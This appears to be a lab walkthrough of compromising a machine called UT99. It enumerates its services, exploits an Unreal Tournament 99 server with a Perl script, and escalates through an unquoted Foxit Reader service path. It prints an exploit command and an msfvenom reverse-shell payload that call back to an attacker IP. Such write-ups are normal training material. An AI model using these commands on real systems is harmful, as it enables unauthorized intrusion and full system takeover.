# UT99 ## Information Gathering `sudo ./nmapAutomator.sh 192.168.175.44 all` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fhp2l0FKPCv3ZRsepyo3U%2Fimage.png?alt=media\&token=88466f91-4732-44ed-90bf-2e9132b79fe9) We also have IRC open ports at range 6660 to 7000 and 7007. ### Service Enumeration ### FTP (Port 21) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F71T1RcNbak9BOU1CLD3j%2Fimage.png?alt=media\&token=77371a5c-1370-4076-8ec7-36fd68de4c69) We tried various standard login credentials but all did not work. ### HTTP (Port 80) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F3oVGFqiIf24ebGJ67EFc%2Fimage.png?alt=media\&token=a8046ba5-49df-485d-9f09-129bb4258d08) Looks like this is running Dragonfly CMS. Manual enumeration led us to conclude this is a dead end. ### IRC Ports (6660-7000 and 7007) We can install `HexChat IRC Client` using the following command: `apt-get install hexchat -y` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FIVgDFuYPxPpAXBksAirF%2Fimage.png?alt=media\&token=17059cb4-cb5f-4e75-96ea-5fa77085dc7f) We can add a new network and name it however we want. Next, click on the `Edit` to edit the parameters. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FMxmZVYRUgzQ1XMB3YedG%2Fimage.png?alt=media\&token=8649be0a-5d29-4956-9906-b1ef42ab275f) Here, add the IP and port number and click close. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F1b2NlwEAs6W3iMsTjYFG%2Fimage.png?alt=media\&token=a5884eb3-06f1-4290-96b4-b3717ac1a1c6) Then, we can use any name we want and click connect. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2Fpp8pOZky6xqtfmD7feta%2Fimage.png?alt=media\&token=f3aeb78a-716f-495f-b4af-cca3be340aa2) Here, we click on the server option and click on ChannelList. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F7xFpEYFb5ZvDolpKLSzX%2Fimage.png?alt=media\&token=8fbf8813-25ec-4865-9b30-f7acac6a6d21) Under ChannelList, we can search for channels with users from 1-9999. And we see the channel ut99. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FHipOUUSEG7G8ykRN5gsw%2Fimage.png?alt=media\&token=3aeaa071-71bc-421a-8ff2-08ce880bdf0c) Upon connecting, we see that the Unreal Tournament 99 Game server is hosted on port 7778. ## Exploit {% embed url="" %} `perl 16145.pl 192.168.175.44 7778 192.168.49.175 80` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FyttR71OnyS3G3tgK6Gu0%2Fimage.png?alt=media\&token=488504f3-8a62-4d53-b222-61be0a434e45) ## Privesc `Systeminfo` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FQbhXQQcGa4lwE4G6HFnT%2Fimage.png?alt=media\&token=97c17e20-df8a-4b5d-ab15-725d4004e19e) We manually enumerate and find `ftp` directory. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FpXuBucJ3NxxzfWHeUYvj%2Fimage.png?alt=media\&token=88dacce1-08ca-4bb6-904a-b2710807a6ee) {% embed url="" %} Looks like this version of Foxit Reader is vulnerable to unquoted service path privesc. We can check if it is installed. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FaBvSj3O76pblwfD5N4Mu%2Fimage.png?alt=media\&token=77a3e12d-eec1-44ed-a069-28397358eadb) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FxYcaDLkutinLAaUqYjJq%2Fimage.png?alt=media\&token=4938ba48-a34d-43f8-ab7e-16c3069c6e49) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FHZit0GgHEIyKMfglP8p2%2Fimage.png?alt=media\&token=20912b92-5e29-40a9-83b1-c4bd913caad6) Looks like we have write permissions. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FlP5vAhC3n2tIMl2Aw7wQ%2Fimage.png?alt=media\&token=be225144-112c-46ae-9220-985636e892e5) So let's generate our payload names Foxit.exe. `msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.49.175 LPORT=80 -f exe -o Foxit.exe` Then, we transfer our file to the target machine. ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FQL6XHqDSMaY6zELyxkSo%2Fimage.png?alt=media\&token=7b580577-3fa3-4cef-8ccf-dbb85636fcf4) ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FOg1x923gainjwupe0qc3%2Fimage.png?alt=media\&token=dded8196-f89c-4c8d-9a80-fce12aacab6a) Next, we can reboot the machine. And we get SYSTEM. `shutdown -r -t 5 && exit` ![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FgsTymIt31HqFXwfPl389%2Fimage.png?alt=media\&token=4e331a55-cddb-43fc-b884-968a957198be)